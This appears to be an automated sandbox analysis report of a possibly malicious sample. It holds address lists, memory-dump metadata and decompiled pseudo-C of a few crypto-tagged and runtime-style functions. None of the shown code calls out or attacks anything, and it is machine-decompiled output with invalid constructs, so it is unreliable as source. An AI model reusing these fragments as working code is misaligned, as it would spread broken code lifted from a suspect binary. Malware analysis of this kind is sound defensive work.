                                                                                                                            0x01324b46
                                                                                                                            0x01324b4b
                                                                                                                            0x01324b51
                                                                                                                            0x01324b58
                                                                                                                            0x01324c06
                                                                                                                            0x01324c11
                                                                                                                            0x01324cbe
                                                                                                                            0x01324cc1
                                                                                                                            0x01324cc6
                                                                                                                            0x00000000
                                                                                                                            0x01324c17
                                                                                                                            0x01324c17
                                                                                                                            0x01324c17
                                                                                                                            0x01324c1c
                                                                                                                            0x01324c23
                                                                                                                            0x01324c2e
                                                                                                                            0x01324c42
                                                                                                                            0x01324c47
                                                                                                                            0x01324c4a
                                                                                                                            0x01324c4f
                                                                                                                            0x01324c6e
                                                                                                                            0x01324c73
                                                                                                                            0x01324c73
                                                                                                                            0x01324b5f
                                                                                                                            0x01324b5f
                                                                                                                            0x01324b5f
                                                                                                                            0x01324b6a
                                                                                                                            0x01324e3b
                                                                                                                            0x01324e3b
                                                                                                                            0x01324e43
                                                                                                                            0x00000000
                                                                                                                            0x01324b70
                                                                                                                            0x01324b70
                                                                                                                            0x01324b70
                                                                                                                            0x01324b75
                                                                                                                            0x01324b7a
                                                                                                                            0x01324b7f
                                                                                                                            0x01324b84
                                                                                                                            0x01324b89
                                                                                                                            0x01324b90
                                                                                                                            0x01324b9b
                                                                                                                            0x01324ba8
                                                                                                                            0x01324bb2
                                                                                                                            0x01324bb7
                                                                                                                            0x01324bba
                                                                                                                            0x01324bbf
                                                                                                                            0x01324bd1
                                                                                                                            0x01324bd6
                                                                                                                            0x01324be0
                                                                                                                            0x01324bea
                                                                                                                            0x01324bed
                                                                                                                            0x01324bf5
                                                                                                                            0x01324bfa
                                                                                                                            0x01324ce6
                                                                                                                            0x01324ce6
                                                                                                                            0x01324cee
                                                                                                                            0x01324d73
                                                                                                                            0x01324d78
                                                                                                                            0x01324d86
                                                                                                                            0x01324df9
                                                                                                                            0x01324df9
                                                                                                                            0x01324e00
                                                                                                                            0x00000000
                                                                                                                            0x01324d88
                                                                                                                            0x01324d88
                                                                                                                            0x01324d88
                                                                                                                            0x01324d8d
                                                                                                                            0x01324d9a
                                                                                                                            0x01324d9e
                                                                                                                            0x01324da7
                                                                                                                            0x01324db4
                                                                                                                            0x01324dc0
                                                                                                                            0x01324dc5
                                                                                                                            0x01324dd7
                                                                                                                            0x01324de1
                                                                                                                            0x01324df0
                                                                                                                            0x01324df0
                                                                                                                            0x01324cf5
                                                                                                                            0x01324cf5
                                                                                                                            0x01324cf8
                                                                                                                            0x01324d06
                                                                                                                            0x01324e31
                                                                                                                            0x01324e36
                                                                                                                            0x00000000
                                                                                                                            0x01324d0c
                                                                                                                            0x01324d0c
                                                                                                                            0x01324d0c
                                                                                                                            0x01324d11
                                                                                                                            0x01324d16
                                                                                                                            0x01324d1d
                                                                                                                            0x01324d23
                                                                                                                            0x01324d27
                                                                                                                            0x01324d30
                                                                                                                            0x01324d34
                                                                                                                            0x01324d3b
                                                                                                                            0x01324d40
                                                                                                                            0x01324d4a
                                                                                                                            0x01324d58
                                                                                                                            0x01324e10
                                                                                                                            0x01324e14
                                                                                                                            0x01324e05
                                                                                                                            0x01324e05
                                                                                                                            0x01324e0d
                                                                                                                            0x00000000
                                                                                                                            0x01324e0d
                                                                                                                            0x01324e16
                                                                                                                            0x01324d66
                                                                                                                            0x01324d66
                                                                                                                            0x01324d6b
                                                                                                                            0x00000000
                                                                                                                            0x01324e26
                                                                                                                            0x01324e1b
                                                                                                                            0x01324e23
                                                                                                                            0x01324e23
                                                                                                                            0x01324ccb
                                                                                                                            0x01324cd0
                                                                                                                            0x01324cd3
                                                                                                                            0x01324cdb
                                                                                                                            0x01324ce0
                                                                                                                            0x01324ce3
                                                                                                                            0x00000000
                                                                                                                            0x01324ce3
                                                                                                                            0x01324d06
                                                                                                                            0x01324cee
                                                                                                                            0x01324b6a
                                                                                                                            0x01324c78
                                                                                                                            0x01324c78
                                                                                                                            0x01324cbd
                                                                                                                            0x00000000
                                                                                                                            0x01324e49
                                                                                                                            0x01324e49
                                                                                                                            0x01324e4e
                                                                                                                            0x01324e53
                                                                                                                            0x01324e58
                                                                                                                            0x01324e67

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 586158c531032f4696bb1d17142ab912e93e5a8a1f81e32739356ddecd6cd772
                                                                                                                            • Instruction ID: 17f383c567b2a7b838c0a10d8b9c9c7639598751e0b48e51a0f5255fb1706cc1
                                                                                                                            • Opcode Fuzzy Hash: 586158c531032f4696bb1d17142ab912e93e5a8a1f81e32739356ddecd6cd772
                                                                                                                            • Instruction Fuzzy Hash: 1C919877218B9586DB20DB19F08035ABBA5F786BD8F546226EBDE53B59CB3CC051CB00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01308240 Relevance: .2, Instructions: 161COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E01308240(signed int __eax, signed int* __rax, signed int __rbx, signed long long __rcx) {
				void* _t66;
				void* _t67;
				signed long long _t79;
				signed long long _t83;
				signed long long _t86;
				signed int* _t90;
				signed long long _t98;
				signed long long _t109;
				signed long long _t111;
				signed long long _t119;
				signed long long _t121;

				_t91 = __rcx;
				_t73 = __rax;
				_t44 = __eax;
				_t86 = __rbx ^  *0x14cf5a0 ^ 0x78bd642f;
				if(__rcx == 0) {
					return __eax;
				} else {
					_t66 = __rcx - 4;
					if(_t66 < 0) {
						_t91 = __rcx;
					} else {
						if(_t66 == 0) {
						} else {
							_t67 = __rcx - 8;
							if(_t67 < 0) {
								_t44 =  *(__rax + __rcx - 4);
							} else {
								if(_t67 == 0) {
								} else {
									if(__rcx > 0x10) {
										if(__rcx <= 0x30) {
											_t98 = __rcx;
										} else {
											_t98 = __rcx;
											_t119 = _t86;
											_t109 = _t119;
											while(_t91 > 0x30) {
												_t90 = _t73;
												_t44 = _t44 * ( *_t73 ^ 0xa0b428db) * (_t90[4] ^ 0x9c88c6e3) * (_t90[8] ^ 0x75374cc3);
												_t91 = _t91 + 0xffffffd0;
												_t121 = _t73[2] ^ _t86 ^ _t98;
												0;
												_t111 = _t90[6] ^ _t119 ^ _t98;
												_t83 = _t90[0xa] ^ _t109 ^ _t98;
												_t43 =  &(_t90[0xc]); // -8161530843051276525
												_t86 = _t121;
												_t119 = _t111;
												_t109 = _t83;
												_t73 = _t43;
											}
											_t86 = _t86 ^ _t119 ^ _t109;
											L17:
											while(_t91 > 0x10) {
												_t44 = _t44 * ( *_t73 ^ 0xa0b428db);
												_t91 = _t91 + 0xfffffff0;
												_t79 = _t73[2] ^ _t86 ^ _t98;
												_t86 = _t79;
												_t73 =  &(_t73[4]);
											}
											_t91 = _t98;
											goto L15;
										}
										goto L17;
									}
								}
							}
						}
					}
					L15:
					return _t44 * 0xa0b428db * 0xc47d124f;
				}
			}














                                                                                                                            0x01308240
                                                                                                                            0x01308240
                                                                                                                            0x01308240
                                                                                                                            0x01308251
                                                                                                                            0x01308257
                                                                                                                            0x01308307
                                                                                                                            0x01308260
                                                                                                                            0x01308260
                                                                                                                            0x01308264
                                                                                                                            0x013082fd
                                                                                                                            0x01308266
                                                                                                                            0x01308266
                                                                                                                            0x01308268
                                                                                                                            0x01308268
                                                                                                                            0x0130826c
                                                                                                                            0x013082c4
                                                                                                                            0x0130826e
                                                                                                                            0x0130826e
                                                                                                                            0x01308270
                                                                                                                            0x01308274
                                                                                                                            0x0130827a
                                                                                                                            0x0130828a
                                                                                                                            0x0130827c
                                                                                                                            0x0130827c
                                                                                                                            0x0130827f
                                                                                                                            0x01308282
                                                                                                                            0x0130842a
                                                                                                                            0x013083af
                                                                                                                            0x01308400
                                                                                                                            0x01308403
                                                                                                                            0x0130840a
                                                                                                                            0x0130840d
                                                                                                                            0x0130840f
                                                                                                                            0x01308414
                                                                                                                            0x01308417
                                                                                                                            0x0130841e
                                                                                                                            0x01308421
                                                                                                                            0x01308424
                                                                                                                            0x01308427
                                                                                                                            0x01308427
                                                                                                                            0x01308437
                                                                                                                            0x00000000
                                                                                                                            0x0130836f
                                                                                                                            0x01308355
                                                                                                                            0x01308358
                                                                                                                            0x0130835f
                                                                                                                            0x01308369
                                                                                                                            0x0130836c
                                                                                                                            0x0130836c
                                                                                                                            0x0130838d
                                                                                                                            0x00000000
                                                                                                                            0x01308390
                                                                                                                            0x00000000
                                                                                                                            0x0130827a
                                                                                                                            0x01308274
                                                                                                                            0x0130826e
                                                                                                                            0x0130826c
                                                                                                                            0x01308266
                                                                                                                            0x01308308
                                                                                                                            0x01308334
                                                                                                                            0x01308334

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0ba78f681946b52f0f48d3868601dc9d2aef480fe8b4301b32dbd940ef966982
                                                                                                                            • Instruction ID: ca059d94d7a0dce1a87227edfa7574ed83e28338e8f32c9119022c304001c438
                                                                                                                            • Opcode Fuzzy Hash: 0ba78f681946b52f0f48d3868601dc9d2aef480fe8b4301b32dbd940ef966982
                                                                                                                            • Instruction Fuzzy Hash: 2141E9A6B01B5981EE058A6649300AEA7A5E74EFD4389E273CF1D77BACC63CD506C344
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01318900 Relevance: .2, Instructions: 159COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 49%
                                                                                                                            			E01318900(long long __rax, void* __rdi, long long __rbp, intOrPtr __r14, long long _a8) {
				char _v8;
				signed long long _v16;
				long long _v24;
				char _v32;
				signed long long _v40;
				signed int _v41;
				void* _t41;
				void* _t43;
				signed int _t49;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t74;
				void* _t77;
				intOrPtr _t80;
				void* _t86;
				intOrPtr _t88;
				intOrPtr _t89;
				signed long long _t90;
				void* _t92;
				char* _t97;
				void* _t102;
				long long* _t103;
				intOrPtr _t109;
				void* _t112;
				signed long long _t113;
				signed long long _t116;
				void* _t118;
				void* _t121;

				L0:
				while(1) {
					L0:
					_t119 = __r14;
					_t92 = __rdi;
					_t78 = __rax;
					if(_t102 >  *((intOrPtr*)(__r14 + 0x10))) {
						break;
					}
					L32:
					_a8 = __rax;
					E01356200(_t86, __rbp);
				}
				L1:
				_t103 = _t102 - 0x58;
				_v8 = __rbp;
				_t97 =  &_v8;
				if( *((intOrPtr*)( *((intOrPtr*)(__rax + 0x30)))) == __r14) {
					return _t41;
				} else {
					_t88 =  *((intOrPtr*)(__r14 + 0x30));
					if( *((intOrPtr*)(_t88 + 0xd8)) > 0 ||  *((long long*)(_t88 + 0xd0)) != 0) {
						return _t41;
					} else {
						_a8 = __rax;
						_t49 = 0;
						while(1) {
							_t89 =  *0x14cfd60; // 0x0
							_t109 =  *0x14cfd68; // 0x0
							_t116 =  *0x14cfd28; // 0x0
							asm("xorps xmm0, xmm0");
							asm("repne dec ecx");
							asm("dec ax");
							asm("mulsd xmm0, xmm1");
							asm("repne dec eax");
							asm("dec cx");
							asm("movsd xmm1, [0xfdb78]");
							asm("mulsd xmm1, xmm0");
							asm("repne dec esp");
							_t112 =  <  ? _t109 :  ~( *(_t78 + 0x180));
							r8d = 0x10000;
							_t90 =  <  ? _t109 : _t89;
							if(_t116 <= 0) {
								goto L13;
							}
							L9:
							if(_t116 >= _t90) {
								 *(_t78 + 0x180) =  *(_t78 + 0x180) + _t112;
								_t116 = _t90;
							} else {
								asm("xorps xmm1, xmm1");
								asm("repne dec ecx");
								asm("mulsd xmm1, xmm0");
								asm("repne dec esp");
								 *(_t78 + 0x180) = _t112 +  *(_t78 + 0x180) + 1;
							}
							_t113 = _t116;
							_t116 =  ~_t116;
							asm("lock dec ebp");
							_t90 = _t90 - _t113;
							if(_t90 == 0) {
								if(_t49 != 0) {
									_t43 = L0134BA20(0x2c, 1, _t53, 0, _t59, _t60, _t77, _t78, 0xffffffff, _t85, _t92, _t92, _t97, _t119, _t121);
								}
								return _t43;
							} else {
								goto L13;
							}
							goto L33;
							L13:
							if( *0x14814f0 != 0 && _t49 == 0) {
								_v40 = _t90;
								L0134BA20(0x2b, 1, _t53, 0, _t59, _t60, _t77, _t78, 0x1318ba0, _t85, _t92, _t92, _t97, _t119, _t121);
								_t78 = _a8;
								_t90 = _v40;
								_t49 = 1;
							}
							_v41 = _t49;
							asm("inc esp");
							_v16 = 0;
							_v32 = 0x1318ba0;
							_v24 = _t78;
							_v16 = _t90;
							_t91 =  &_v32;
							 *_t103 =  &_v32;
							_t43 = E013560C0(1, _t49, _t53, 0, _t58, _t59, _t60, _t77, _t97, _t116, 0x14cfd28, _t118, _t119, _t121);
							asm("inc ebp");
							_t119 =  *((intOrPtr*)( *[gs:0x28]));
							_t80 = _a8;
							_t85 =  *((intOrPtr*)(_t80 + 0x88));
							if( *0x14cf560 != 0) {
								_t92 = _t80 + 0x88;
								_t53 = 0;
								_t43 = E01358540(_t80,  &_v32);
							} else {
								 *((long long*)(_t80 + 0x88)) = 0;
								_t74 = _t85;
							}
							if(_t74 != 0) {
								_t43 = L01315680(_t92, _t97, _t119);
								_t80 = _a8;
							}
							if( *((long long*)(_t80 + 0x180)) >= 0) {
								L29:
								_t54 = _v41 & 0x000000ff;
								if((_v41 & 0x000000ff) != 0) {
									_t43 = L0134BA20(0x2c, 1, _t54, 0, _t59, _t60, _t77, _t80, 0xffffffff, _t85, _t92, _t92, _t97, _t119, _t121);
								}
								return _t43;
							} else {
								if( *((char*)(_t80 + 0xb1)) == 0) {
									_t43 = E01318F80(0x1318ba0, _t85, _t91, _t97, _t119);
									if(_t43 == 0) {
										_t78 = _a8;
										_t49 = _v41 & 0x000000ff;
										continue;
									} else {
										goto L29;
									}
								} else {
									_t43 = E01356040(_t43, 0x14015f0, _t97, _t119);
									_t85 = _a8;
									_t53 = _v41 & 0x000000ff;
									_t78 = _a8;
									_t49 = _v41 & 0x000000ff;
									while(1) {
										_t89 =  *0x14cfd60; // 0x0
										_t109 =  *0x14cfd68; // 0x0
										_t116 =  *0x14cfd28; // 0x0
										asm("xorps xmm0, xmm0");
										asm("repne dec ecx");
										asm("dec ax");
										asm("mulsd xmm0, xmm1");
										asm("repne dec eax");
										asm("dec cx");
										asm("movsd xmm1, [0xfdb78]");
										asm("mulsd xmm1, xmm0");
										asm("repne dec esp");
										_t112 =  <  ? _t109 :  ~( *(_t78 + 0x180));
										r8d = 0x10000;
										_t90 =  <  ? _t109 : _t89;
										if(_t116 <= 0) {
											goto L13;
										}
										goto L9;
									}
								}
							}
							goto L33;
						}
					}
				}
				L33:
			}
































                                                                                                                            0x01318900
                                                                                                                            0x01318900
                                                                                                                            0x01318900
                                                                                                                            0x01318900
                                                                                                                            0x01318900
                                                                                                                            0x01318900
                                                                                                                            0x01318904
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01318b7d
                                                                                                                            0x01318b7d
                                                                                                                            0x01318b82
                                                                                                                            0x01318b87
                                                                                                                            0x0131890a
                                                                                                                            0x0131890a
                                                                                                                            0x0131890e
                                                                                                                            0x01318913
                                                                                                                            0x01318923
                                                                                                                            0x01318958
                                                                                                                            0x01318925
                                                                                                                            0x01318925
                                                                                                                            0x01318930
                                                                                                                            0x0131894e
                                                                                                                            0x0131893c
                                                                                                                            0x0131893c
                                                                                                                            0x01318941
                                                                                                                            0x01318963
                                                                                                                            0x01318964
                                                                                                                            0x0131896d
                                                                                                                            0x0131897b
                                                                                                                            0x01318985
                                                                                                                            0x01318988
                                                                                                                            0x0131898d
                                                                                                                            0x01318992
                                                                                                                            0x01318996
                                                                                                                            0x0131899b
                                                                                                                            0x013189a0
                                                                                                                            0x013189a8
                                                                                                                            0x013189ac
                                                                                                                            0x013189b8
                                                                                                                            0x013189bc
                                                                                                                            0x013189c2
                                                                                                                            0x013189c9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013189cb
                                                                                                                            0x013189ce
                                                                                                                            0x013189f4
                                                                                                                            0x013189fb
                                                                                                                            0x013189d0
                                                                                                                            0x013189d0
                                                                                                                            0x013189d3
                                                                                                                            0x013189d8
                                                                                                                            0x013189dc
                                                                                                                            0x013189eb
                                                                                                                            0x013189eb
                                                                                                                            0x013189fe
                                                                                                                            0x01318a01
                                                                                                                            0x01318a0b
                                                                                                                            0x01318a10
                                                                                                                            0x01318a16
                                                                                                                            0x01318b2c
                                                                                                                            0x01318b42
                                                                                                                            0x01318b42
                                                                                                                            0x01318b50
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01318a1c
                                                                                                                            0x01318a23
                                                                                                                            0x01318a29
                                                                                                                            0x01318a40
                                                                                                                            0x01318a45
                                                                                                                            0x01318a4a
                                                                                                                            0x01318a4f
                                                                                                                            0x01318a4f
                                                                                                                            0x01318a54
                                                                                                                            0x01318a58
                                                                                                                            0x01318a5e
                                                                                                                            0x01318a6e
                                                                                                                            0x01318a73
                                                                                                                            0x01318a78
                                                                                                                            0x01318a7d
                                                                                                                            0x01318a82
                                                                                                                            0x01318a86
                                                                                                                            0x01318a8b
                                                                                                                            0x01318a98
                                                                                                                            0x01318a9f
                                                                                                                            0x01318aa4
                                                                                                                            0x01318ab5
                                                                                                                            0x01318ac7
                                                                                                                            0x01318ace
                                                                                                                            0x01318ad0
                                                                                                                            0x01318ab7
                                                                                                                            0x01318ab7
                                                                                                                            0x01318ac2
                                                                                                                            0x01318ac2
                                                                                                                            0x01318ad8
                                                                                                                            0x01318ada
                                                                                                                            0x01318adf
                                                                                                                            0x01318adf
                                                                                                                            0x01318aec
                                                                                                                            0x01318b51
                                                                                                                            0x01318b51
                                                                                                                            0x01318b58
                                                                                                                            0x01318b6e
                                                                                                                            0x01318b6e
                                                                                                                            0x01318b7c
                                                                                                                            0x01318aee
                                                                                                                            0x01318af5
                                                                                                                            0x01318b19
                                                                                                                            0x01318b22
                                                                                                                            0x01318959
                                                                                                                            0x0131895e
                                                                                                                            0x00000000
                                                                                                                            0x01318b28
                                                                                                                            0x00000000
                                                                                                                            0x01318b28
                                                                                                                            0x01318af8
                                                                                                                            0x01318b00
                                                                                                                            0x01318b05
                                                                                                                            0x01318b0a
                                                                                                                            0x01318b0f
                                                                                                                            0x01318b12
                                                                                                                            0x01318963
                                                                                                                            0x01318964
                                                                                                                            0x0131896d
                                                                                                                            0x0131897b
                                                                                                                            0x01318985
                                                                                                                            0x01318988
                                                                                                                            0x0131898d
                                                                                                                            0x01318992
                                                                                                                            0x01318996
                                                                                                                            0x0131899b
                                                                                                                            0x013189a0
                                                                                                                            0x013189a8
                                                                                                                            0x013189ac
                                                                                                                            0x013189b8
                                                                                                                            0x013189bc
                                                                                                                            0x013189c2
                                                                                                                            0x013189c9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013189c9
                                                                                                                            0x01318963
                                                                                                                            0x01318af5
                                                                                                                            0x00000000
                                                                                                                            0x01318aec
                                                                                                                            0x01318963
                                                                                                                            0x01318930
                                                                                                                            0x00000000

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cadcfb983705da15d4a5ff24861409723ae0c54f112e11012fb5ebe3e73de934
                                                                                                                            • Instruction ID: 49fbac7c622267c629fffbc3b9d8a41944fef0b647a673541f60b1ba4171bb80
                                                                                                                            • Opcode Fuzzy Hash: cadcfb983705da15d4a5ff24861409723ae0c54f112e11012fb5ebe3e73de934
                                                                                                                            • Instruction Fuzzy Hash: 80512C72609B8486E749CB29E0403AA7762F796BD8F04D262EA9D53B9DDF3CC055C704
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A6EC30 Relevance: .2, Instructions: 157COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E0000025B25BF8A6EC30(intOrPtr* __rcx, intOrPtr _a32, intOrPtr _a40, signed long long _a48, signed long long _a56, long long _a64, long long _a72) {
				intOrPtr _v56;
				intOrPtr _v64;
				void* __rbx;
				void* _t27;
				void* _t33;
				void* _t38;
				void* _t39;
				void* _t46;
				intOrPtr* _t52;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t65;
				void* _t66;

				_t65 = _t60;
				if ( *0xf8aa2840 == 0) goto 0xf8a6ecd7;
				if ( *((intOrPtr*)(__rcx + 0x24)) != 0) goto 0xf8a6ecd7;
				r9d = 0;
				 *((long long*)(_t65 - 0x18)) =  *((intOrPtr*)(__rcx + 0x18));
				 *((long long*)(_t65 - 0x20)) =  *((intOrPtr*)(__rcx + 0x10));
				 *(_t65 - 0x28) =  *(_t65 - 0x28) & 0x00000000;
				 *(_t65 - 0x30) =  *(_t65 - 0x30) & 0x00000000;
				_v56 =  *((intOrPtr*)(__rcx + 0x20));
				_v64 = 1;
				 *(_t65 - 0x48) =  *(_t65 - 0x48) & 0x00000000;
				_t27 =  *0xf8a8b480();
				if (_t27 != 0) goto 0xf8a6ed26;
				"\\%s: %d"();
				if (_t27 != 0x522) goto 0xf8a6ecbd;
				if ( *0xf8a8b470 == 0) goto 0xf8a6ecbd;
				_t55 = __rcx;
				_pop(_t52);
				goto 0xf8a6efd8;
				"\\%s: %d"();
				r8d = _t27;
				E0000025B25BF8A6D04C(_t52, __rcx,  *_t52, _t59,  *__rcx);
				goto 0xf8a6ed2b;
				r9d = 0;
				_a72 =  *((intOrPtr*)(_t52 + 0x18));
				r8d = 0;
				_a64 =  *((intOrPtr*)(_t52 + 0x10));
				_a56 = _a56 & 0x00000000;
				_a48 = _a48 & 0x00000000;
				_a40 =  *((intOrPtr*)(_t52 + 0x20));
				_a32 = 1;
				if (E0000025B25BF8A8B4E0( *((intOrPtr*)(_t52 + 0x20)), _t33, 0, _t38, _t39, _t46,  *((intOrPtr*)(_t52 + 0x10)), _t52, _t55,  *_t52, _t58, _t59, _t65, _t66) != 0) goto 0xf8a6ed26;
				"\\%s: %d"();
				goto 0xf8a6ecc8;
				return 1;
			}

















                                                                                                                            0x25bf8a6ec30
                                                                                                                            0x25bf8a6ec45
                                                                                                                            0x25bf8a6ec4f
                                                                                                                            0x25bf8a6ec5c
                                                                                                                            0x25bf8a6ec5f
                                                                                                                            0x25bf8a6ec69
                                                                                                                            0x25bf8a6ec6d
                                                                                                                            0x25bf8a6ec72
                                                                                                                            0x25bf8a6ec7a
                                                                                                                            0x25bf8a6ec7e
                                                                                                                            0x25bf8a6ec86
                                                                                                                            0x25bf8a6ec8b
                                                                                                                            0x25bf8a6ec93
                                                                                                                            0x25bf8a6ec99
                                                                                                                            0x25bf8a6eca4
                                                                                                                            0x25bf8a6ecae
                                                                                                                            0x25bf8a6ecb0
                                                                                                                            0x25bf8a6ecb7
                                                                                                                            0x25bf8a6ecb8
                                                                                                                            0x25bf8a6ecbd
                                                                                                                            0x25bf8a6eccb
                                                                                                                            0x25bf8a6ecce
                                                                                                                            0x25bf8a6ecd5
                                                                                                                            0x25bf8a6ecde
                                                                                                                            0x25bf8a6ece1
                                                                                                                            0x25bf8a6ecea
                                                                                                                            0x25bf8a6eced
                                                                                                                            0x25bf8a6ecf2
                                                                                                                            0x25bf8a6ecfb
                                                                                                                            0x25bf8a6ed01
                                                                                                                            0x25bf8a6ed07
                                                                                                                            0x25bf8a6ed17
                                                                                                                            0x25bf8a6ed19
                                                                                                                            0x25bf8a6ed24
                                                                                                                            0x25bf8a6ed30
